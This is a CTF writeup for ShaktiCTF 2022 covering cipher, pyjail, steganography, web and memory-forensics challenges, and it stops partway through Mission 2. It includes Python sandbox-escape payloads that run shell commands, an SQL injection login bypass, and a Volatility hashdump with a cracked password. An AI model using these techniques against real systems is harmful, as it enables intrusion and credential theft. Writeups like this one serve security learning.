This CTF ran from 2022/12/9 23:30 (JST) to 2022/12/10 23:30 (JST).
I played as part of a team again. We finished with 4670 points, 1st place out of 387 teams.
Below are writeups for the challenges I solved myself.
Cipher Puzzle (Misc 100)
Guessing Morse code, I decoded it with https://morsecode.world/international/translator.html.

```
01110101 01110010 01101001 01100111 01111010 01110111 01110011 01111010 01101000 01111011 00110101 01110010 00110100 01100111 00110111 01110111 01010011 00110000 01110110 01010001 00110000 01010000 00110101 00110011 01111101
```

Then decode that in CyberChef with the following recipe:

From Binary (Delimiter: Space, Byte Length: 8)

```
urigzwszh{5r4g7wS0vQ0P53}
```
This looks like a substitution cipher. Writing down the correspondence table as far as the flag format ("shaktictf{") determines it:

```
plain : abcdefghijklmnopqrstuvwxyz
cipher: i s  h rw g       uz
```

The cipher letters g, h and i are assigned to plaintext letters that are four apart (k, f, a), i.e. the cipher alphabet steps through the alphabet at a fixed stride. Using that pattern, the gaps in the table can be filled in:

```
plain : abcdefghijklmnopqrstuvwxyz
cipher: insxchmrwbglqvafkpuzejotyd
```

Decrypting with this table gives the flag.
shaktictf{5h4k7iC0nM0R53}
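The same decoding done by hand, as an added example that is not part of the original writeup. The completed table above is a stride-5 walk through the alphabet, so it is the affine cipher c = 5p + 8 (mod 26); that affine reading is my own inference from the table, and the block checks it before decrypting.

```python
# Constructed example: decode the Cipher Puzzle ciphertext from the binary
# dump, verifying that the writeup's filled-in table is affine (a=5, b=8).
BINARY = ("01110101 01110010 01101001 01100111 01111010 01110111 01110011 01111010 "
          "01101000 01111011 00110101 01110010 00110100 01100111 00110111 01110111 "
          "01010011 00110000 01110110 01010001 00110000 01010000 00110101 00110011 "
          "01111101")
ALPHA = "abcdefghijklmnopqrstuvwxyz"
CIPHER_ALPHA = "insxchmrwbglqvafkpuzejotyd"   # the completed table from the writeup


def binary_to_text(bits: str) -> str:
    """Same as CyberChef 'From Binary' with a space delimiter and 8-bit bytes."""
    return "".join(chr(int(b, 2)) for b in bits.split())


def table_is_affine(cipher_alpha: str, a: int, b: int) -> bool:
    """True if cipher[p] == ALPHA[(a*p + b) % 26] for every plaintext index p."""
    return all(cipher_alpha[p] == ALPHA[(a * p + b) % 26] for p in range(26))


def affine_decrypt(ct: str, a: int, b: int) -> str:
    """Invert c = a*p + b (mod 26). Non-letters pass through, case is kept."""
    a_inv = pow(a, -1, 26)          # 5 * 21 == 105 == 1 (mod 26)
    out = []
    for ch in ct:
        if ch.isalpha():
            c = ALPHA.index(ch.lower())
            p = (a_inv * (c - b)) % 26
            out.append(ALPHA[p].upper() if ch.isupper() else ALPHA[p])
        else:
            out.append(ch)
    return "".join(out)


def solve() -> str:
    ct = binary_to_text(BINARY)
    # Guard: only use the affine shortcut if the table really has that shape.
    assert table_is_affine(CIPHER_ALPHA, 5, 8)
    return affine_decrypt(ct, 5, 8)


if __name__ == "__main__":
    print(solve())
```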
level0 (Misc 100)
A pyjail challenge.

```
$ nc 65.2.136.80 30212
Ever seen the movie 'Escape room'? Well, now you can play it yourself!
*********************************************************
You are in a room with a door. Enter the password to open the door.
Hint:Try using the tablet.
*********************************************************
Player's Tablet Functions:
1. Run password cracker
2. Give up
Enter your choice: 1
Password cracker is running...
>>> print("".__class__.__mro__[1].__subclasses__())
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>]
None
*********************************************************
Player's Tablet Functions:
1. Run password cracker
2. Give up
Enter your choice: 1
Password cracker is running...
>>> "".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['system']('ls -la')
total 8
drwxr-xr-x   1 root root   17 Dec 10 00:58 .
drwxr-xr-x   1 root root   17 Dec 10 00:58 ..
-rwxr-xr-x   1 root root    0 Dec 10 00:58 .dockerenv
lrwxrwxrwx   1 root root    7 Nov 30 02:04 bin -> usr/bin
drwxr-xr-x   2 root root    6 Apr 15  2020 boot
drwxr-xr-x   5 root root  360 Dec 10 00:58 dev
drwxr-xr-x   1 root root   66 Dec 10 00:58 etc
-rw-rw-rw-   1 root root   96 Dec 10 00:45 flag.txt
drwxr-xr-x   2 root root    6 Apr 15  2020 home
lrwxrwxrwx   1 root root    7 Nov 30 02:04 lib -> usr/lib
lrwxrwxrwx   1 root root    9 Nov 30 02:04 lib32 -> usr/lib32
lrwxrwxrwx   1 root root    9 Nov 30 02:04 lib64 -> usr/lib64
lrwxrwxrwx   1 root root   10 Nov 30 02:04 libx32 -> usr/libx32
drwxr-xr-x   2 root root    6 Nov 30 02:04 media
drwxr-xr-x   2 root root    6 Nov 30 02:04 mnt
drwxr-xr-x   2 root root    6 Nov 30 02:04 opt
dr-xr-xr-x 260 root root    0 Dec 10 00:58 proc
-rw-rw-rw-   1 root root 1666 Dec 10 00:45 pyjail.py
drwx------   2 root root   37 Nov 30 02:07 root
drwxr-xr-x   1 root root   21 Dec 10 00:58 run
lrwxrwxrwx   1 root root    8 Nov 30 02:04 sbin -> usr/sbin
drwxr-xr-x   2 root root    6 Nov 30 02:04 srv
dr-xr-xr-x  13 root root    0 Dec 10 00:58 sys
drwxrwxrwt   1 root root    6 Dec 10 00:47 tmp
drwxr-xr-x   1 root root   81 Nov 30 02:04 usr
drwxr-xr-x   1 root root   54 Nov 30 02:07 var
None
*********************************************************
Player's Tablet Functions:
1. Run password cracker
2. Give up
Enter your choice: 1
Password cracker is running...
>>> "".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['system']('cat flag.txt')
Congrats! You found the password. But the game ain't over.....
shakti{7h47_w45_7Un!3a36rgjsk9}None
*********************************************************
```
shakti{7h47_w45_7Un!3a36rgjsk9}
level1 (Misc)
Another pyjail challenge.

```
$ nc 65.2.136.80 30042
You may have gotten out of the first room, but you're not out of the woods yet.
*********************************************************
This time, you find yourself in an corridor with an open door at the end. But then the door opens, and you find a hoard of robots coming your way. You need to find a way to stop them and get out of the corridor. And for that, you need the kill code.
*********************************************************
Player's Tablet Functions:
1. Crack kill code
2. Give up
Enter your choice: 1
Find the kill code...
>>> ().__class__.__bases__[0].__subclasses__()
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>]
*********************************************************
Player's Tablet Functions:
1. Crack kill code
2. Give up
Enter your choice: 1
Find the kill code...
>>> ().__class__.__bases__[0].__subclasses__()[109].__init__.__globals__['sys'].modules['os'].system("ls")
bin boot dev etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc pyjail1.py root run sbin srv sys tmp usr var
0
*********************************************************
Player's Tablet Functions:
1. Crack kill code
2. Give up
Enter your choice: 1
Find the kill code...
>>> ().__class__.__bases__[0].__subclasses__()[109].__init__.__globals__['sys'].modules['os'].system("cat flag.txt")
The robots stop at once.You are saved! But now you have to face the biggest challenge of all. Word of advice,remember this:weYbdk9012ghiwh=0?
shakti{7h47_W45_4_Cl053_C4ll!!!}0
```
shakti{7h47_W45_4_Cl053_C4ll!!!}
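From the defender's side of both rooms: both escapes walk from a literal through `__class__`/`__mro__`/`__bases__` to `__subclasses__()` and then into a function's `__globals__`. An AST pre-check that refuses such input before it reaches `eval`/`exec` is shown below as an added example; it is not the challenge's pyjail.py, and the deny-list contents are my own choice.

```python
import ast

# Constructed example: static pre-check for a Python "jail". Names below are
# assumptions; they cover the attribute walk used in level0 and level1.
DENIED_NAMES = {"getattr", "setattr", "vars", "globals", "locals",
                "eval", "exec", "compile", "open", "__import__", "breakpoint"}


def jail_violations(src: str) -> list:
    """Return the reasons the snippet should be rejected (empty list = allowed)."""
    try:
        tree = ast.parse(src)
    except SyntaxError as exc:
        return ["syntax error: %s" % exc.msg]
    found = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            found.append("import statement")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            # Any dunder attribute: __class__, __mro__, __subclasses__, __globals__ ...
            found.append("attribute " + node.attr)
        elif isinstance(node, ast.Name) and node.id in DENIED_NAMES:
            found.append("name " + node.id)
    return found


def is_allowed(src: str) -> bool:
    return not jail_violations(src)


if __name__ == "__main__":
    for snippet in ('print(sum(range(10)))',
                    '"".__class__.__mro__[1].__subclasses__()'):
        print(repr(snippet), "->", jail_violations(snippet) or "allowed")
```

A name-based filter is only a first layer; untrusted snippets still belong in a separate process with the builtins they do not need removed.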
Winter Reindeer (Misc 100)
The file contains nothing but spaces, tabs and newlines, so I guessed something was hidden with stegsnow.
The free hint says:
Hint #1 The name of the person is case sensitive. (Eg: Xxx Xxx)
From this hint, the password is presumably the inventor of the universal joint mentioned in the challenge text. A quick search shows that "Gerolamo Cardano" is one of the inventors of the universal joint.

```
$ stegsnow -C -Q -p "Gerolamo Cardano" snow_chall.txt
shaktictf{H4v3_4_5n0wy_c7f}
```
shaktictf{H4v3_4_5n0wy_c7f}
L0g1n F4il3d (Web exploitation 100)
SQL injection. Entering the following and logging in displayed the flag.

```
Username: admin
Password: ' or 1=1 -- -
```

```
Hey 'admin'! Here is your flag: '('admin', 'shaktictf{s1mpl3_sql_inject1on_ehehhehe564321345}')'.
```
shaktictf{s1mpl3_sql_inject1on_ehehhehe564321345}
Follow Up (Forensics 100)
Following the TCP stream in Wireshark shows a PNG. Saving the stream as a PNG file in Raw format gives an image with the flag written on it.
shaktictf{that_was_e4sy!}
Fishy File (Forensics 100)
A hex editor shows a PDF in reverse byte order, so reverse it back. The PDF looks blank, but select-all highlights something; copying and pasting it gives:
shaktictf{Th1s_I5_N0t_tH3_Fl4g!}
That was a dummy flag.

```
$ binwalk flag.pdf

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PDF document, version: "1.4"
197           0xC5            Zlib compressed data, default compression
872           0x368           Zlib compressed data, default compression
15901         0x3E1D          Zlib compressed data, default compression
16699         0x413B          PNG image, 1575 x 1179, 8-bit/color RGB, non-interlaced
16878         0x41EE          Zlib compressed data, best compression
418797        0x663ED         PDF document, version: "1.4"
418995        0x664B3         Zlib compressed data, default compression
421923        0x67023         Zlib compressed data, default compression
439080        0x6B328         Zlib compressed data, default compression
439616        0x6B540         Zlib compressed data, default compression
460624        0x70750         Zlib compressed data, default compression
```

Something that looks like a PNG is embedded, but in the hex editor several chunk names are wrong, so fix them and carve it out.

```
IDHR -> IHDR
idat -> IDAT
INED -> IEND
```

```python
#!/usr/bin/env python3
with open('shakti.dat', 'rb') as f:
    data = f.read()

# The whole file is byte-reversed: restore the PDF first.
with open('flag.pdf', 'wb') as f:
    f.write(data[::-1])

# binwalk offsets: the PNG starts at 16699 and ends where the second PDF begins (418797).
data = data[::-1][16699:418797]

# Restore the deliberately corrupted chunk type names.
data = data.replace(b'IDHR', b'IHDR')
data = data.replace(b'idat', b'IDAT')
data = data.replace(b'INED', b'IEND')

with open('flag.png', 'wb') as f:
    f.write(data)
```

The extracted PNG image has the flag written on it.
shaktictf{Y0Uuu_G0t_Th1Ss5}
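A chunk-level check of the repair, as an added example that is not the writeup's script: walk the PNG chunk by chunk and verify each CRC. The CRC covers the chunk type, so renamed chunks fail the check and pass again once the names are restored. The sample PNG is built in memory (constructed) so the block runs without the challenge file.

```python
import struct
import zlib

# Constructed example: PNG chunk walker plus the Fishy File rename repair.
PNG_SIG = b"\x89PNG\r\n\x1a\n"
RENAMES = {b"IDHR": b"IHDR", b"idat": b"IDAT", b"INED": b"IEND"}   # bad -> good


def chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png() -> bytes:
    """A valid 1x1 8-bit greyscale PNG (constructed test input)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    raw = b"\x00\x80"                      # filter byte 0 + one grey pixel
    return (PNG_SIG + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b""))


def walk_chunks(png: bytes) -> list:
    """Return (type, length, crc_ok) for each chunk; stop at a truncated one."""
    if not png.startswith(PNG_SIG):
        raise ValueError("missing PNG signature")
    out, pos = [], len(PNG_SIG)
    while pos + 12 <= len(png):
        length, = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        body = png[pos + 8:pos + 8 + length]
        if len(body) != length:
            break
        stored, = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        out.append((ctype, length, (zlib.crc32(ctype + body) & 0xFFFFFFFF) == stored))
        pos += 12 + length
    return out


def tamper(png: bytes) -> bytes:
    """Rename chunk types the way the challenge file was, leaving CRCs alone."""
    for bad, good in RENAMES.items():
        png = png.replace(good, bad)
    return png


def repair(png: bytes) -> bytes:
    """Undo the renames (the writeup's replace() approach)."""
    for bad, good in RENAMES.items():
        png = png.replace(bad, good)
    return png


if __name__ == "__main__":
    damaged = tamper(build_sample_png())
    for name, length, ok in walk_chunks(damaged):
        print(name, length, "crc ok" if ok else "CRC MISMATCH")
    print("after repair:", walk_chunks(repair(damaged)))
```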
Mission 1 (Forensics 200)
A memory forensics challenge. Three questions must be answered:

1. What is the SHA1 hash of Challenge.raw?
2. What is the user password of TroubleMaker's account?
3. What is the PID of the program used to capture the image?

```
$ sha1sum Challenge.raw
ed85ee47484e503787277807d3ef999586aecf1b  Challenge.raw
```

The SHA1 hash of Challenge.raw is ed85ee47484e503787277807d3ef999586aecf1b.
```
$ volatility -f Challenge.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/Challenge.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf8000282f120L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002831000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2022-12-08 20:05:47 UTC+0000
     Image local date and time : 2022-12-09 01:35:47 +0530

$ volatility -f Challenge.raw --profile=Win7SP1x64 pstree
Volatility Foundation Volatility Framework 2.6
Name                                                  Pid   PPid   Thds   Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
 0xfffffa80061bc660:wininit.exe                       448    348      3     76 2022-12-08 19:58:37 UTC+0000
. 0xfffffa8006236b00:services.exe                     512    448      9    208 2022-12-08 19:58:39 UTC+0000
.. 0xfffffa80068b0b00:wmpnetwk.exe                   2176    512     14    431 2022-12-08 20:00:37 UTC+0000
.. 0xfffffa80066c1060:taskhost.exe                   1676    512      9    215 2022-12-08 19:59:07 UTC+0000
.. 0xfffffa800634ab00:svchost.exe                     912    512     18    482 2022-12-08 19:58:49 UTC+0000
.. 0xfffffa8005f7eb00:SearchIndexer.                 1556    512     14    655 2022-12-08 20:00:15 UTC+0000
.. 0xfffffa8006551b00:svchost.exe                    1312    512     10    148 2022-12-08 19:59:03 UTC+0000
.. 0xfffffa80037c0b00:svchost.exe                    2416    512     11    356 2022-12-08 20:00:48 UTC+0000
.. 0xfffffa8003931b00:mscorsvw.exe                   2064    512      6     84 2022-12-08 20:02:09 UTC+0000
.. 0xfffffa80062f6510:VBoxService.ex                  680    512     13    125 2022-12-08 19:58:46 UTC+0000
.. 0xfffffa800637bb00:svchost.exe                     940    512     32    922 2022-12-08 19:58:49 UTC+0000
.. 0xfffffa800632c060:svchost.exe                     824    512     22    557 2022-12-08 19:58:47 UTC+0000
... 0xfffffa80063be370:audiodg.exe                    236    824      5    123 2022-12-08 19:58:51 UTC+0000
.. 0xfffffa80064ef9d0:spoolsv.exe                    1184    512     14    290 2022-12-08 19:59:01 UTC+0000
.. 0xfffffa800650a860:svchost.exe                    1220    512     19    316 2022-12-08 19:59:02 UTC+0000
.. 0xfffffa80062fab00:svchost.exe                     736    512      7    266 2022-12-08 19:58:47 UTC+0000
.. 0xfffffa80065f3b00:sppsvc.exe                     1896    512      4    143 2022-12-08 19:59:10 UTC+0000
.. 0xfffffa80062ba4f0:svchost.exe                     620    512      9    351 2022-12-08 19:58:45 UTC+0000
... 0xfffffa80039ef7b0:WmiPrvSE.exe                  2508    620      7    112 2022-12-08 20:02:28 UTC+0000
.. 0xfffffa80063efb00:svchost.exe                     368    512     14    465 2022-12-08 19:58:56 UTC+0000
.. 0xfffffa800636d460:svchost.exe                     884    512     29    532 2022-12-08 19:58:49 UTC+0000
... 0xfffffa8006721b00:dwm.exe                       1484    884      3     99 2022-12-08 19:59:40 UTC+0000
.. 0xfffffa8006597b00:svchost.exe                    1400    512     19    274 2022-12-08 19:59:03 UTC+0000
.. 0xfffffa8003b46060:svchost.exe                    2172    512      9    249 2022-12-08 20:03:20 UTC+0000
.. 0xfffffa8003a827b0:mscorsvw.exe                   2604    512      5     79 2022-12-08 20:02:37 UTC+0000
. 0xfffffa8006242930:lsass.exe                        520    448      8    769 2022-12-08 19:58:40 UTC+0000
. 0xfffffa8005faeb00:lsm.exe                          528    448     10    148 2022-12-08 19:58:40 UTC+0000
 0xfffffa80047de060:csrss.exe                         356    348      8    431 2022-12-08 19:58:33 UTC+0000
 0xfffffa80036d0040:System                              4      0     86    537 2022-12-08 19:58:23 UTC+0000
. 0xfffffa8004858040:smss.exe                         272      4      2     29 2022-12-08 19:58:23 UTC+0000
 0xfffffa80061abb00:csrss.exe                         408    400      9    225 2022-12-08 19:58:37 UTC+0000
. 0xfffffa800654e060:conhost.exe                     2628    408      2     53 2022-12-08 20:01:19 UTC+0000
. 0xfffffa8003ae1b00:conhost.exe                     2012    408      2     52 2022-12-08 20:05:36 UTC+0000
 0xfffffa80061ad4c0:winlogon.exe                      440    400      3    113 2022-12-08 19:58:37 UTC+0000
 0xfffffa80037ed3f0:explorer.exe                     1452   1264     39    874 2022-12-08 19:59:41 UTC+0000
. 0xfffffa80067e9500:VBoxTray.exe                    1060   1452     14    149 2022-12-08 19:59:47 UTC+0000
. 0xfffffa80038438f0:cmd.exe                         2612   1452      1     21 2022-12-08 20:01:16 UTC+0000
. 0xfffffa8003798060:DumpIt.exe                       636   1452      2     45 2022-12-08 20:05:34 UTC+0000
. 0xfffffa800388db00:iexplore.exe                    2728   1452     10    486 2022-12-08 20:01:39 UTC+0000
.. 0xfffffa8003b23220:iexplore.exe                   1076   2728     20    549 2022-12-08 20:03:37 UTC+0000
```

The program used to capture the image is DumpIt.exe, whose PID is 636.
```
$ volatility -f Challenge.raw --profile=Win7SP1x64 hivelist
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a00127d010 0x00000000a147a010 \??\C:\Users\TroubleMaker\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a0042f0410 0x000000007ea82410 \SystemRoot\System32\Config\DEFAULT
0xfffff8a00492f010 0x000000008bbe2010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a00000f010 0x00000000a976b010 [no name]
0xfffff8a000024010 0x00000000a97f6010 \REGISTRY\MACHINE\SYSTEM
0xfffff8a00004f010 0x00000000a96a1010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000bff010 0x000000008d0c6010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a000d18010 0x000000006a0eb010 \SystemRoot\System32\Config\SECURITY
0xfffff8a000d6b010 0x0000000061a85010 \SystemRoot\System32\Config\SAM
0xfffff8a000e31410 0x0000000057cfd410 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a000e81010 0x00000000574e0010 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a0011cc010 0x00000000a0f72010 \??\C:\Users\TroubleMaker\ntuser.dat

$ volatility -f Challenge.raw --profile=Win7SP1x64 hashdump -y 0xfffff8a000024010 -s 0xfffff8a000d6b010
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:10eca58175d4228ece151e287086e824:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TroubleMaker:1001:aad3b435b51404eeaad3b435b51404ee:8222c982da6adde81e54c0aeaac4dbed:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:94d88807b15429eb5d7e8f504f3499d1:::
```

Cracking TroubleMaker's NT hash 8222c982da6adde81e54c0aeaac4dbed on CrackStation gives:
londonbridge
shaktictf{ed85ee47484e503787277807d3ef999586aecf1b_londonbridge_636}
Mission 2 (Forensics 300)
A continuation of Mission 1. This time the question is what confidential information TroubleMaker tried to leak.

```
$ volatility -f Challenge.raw --profile=Win7SP1x64 consoles
Volatility Foundation Volatility Framework 2.6
**************************************************
ConsoleProcess: conhost.exe Pid: 2628
Console: 0xffd46200 CommandHistorySize: 50 HistoryBufferCount: 1 HistoryBufferMax: 4
OriginalTitle: Command Prompt
Title: Command Prompt
AttachedProcess: cmd.exe Pid: 2612 Handle: 0x60
----
CommandHistory: 0x20ed90 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 7 LastAdded: 6 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Cmd #0 at 0x203740: cd Documents
Cmd #1 at 0x1ed380: echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk=
Cmd #2 at 0x2139c0: type hint.txt
Cmd #3 at 0x1ed3f0: echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk=
Cmd #4 at 0x2139f0: type hint.txt
Cmd #5 at 0x1ed460: echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk=
Cmd #6 at 0x213a20: type hint.txt
----
Screen 0x1f12a0 X:80 Y:300
Dump:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\TroubleMaker>cd Documents

C:\Users\TroubleMaker\Documents>echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk=
WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk=

C:\Users\TroubleMaker\Documents>type hint.txt
p4sSworD@51073#912

C:\Users\TroubleMaker\Documents>echo WW91IG1pZ2h0IG5lZWQgdGhpcyAtIHZpY3Rvcnk=
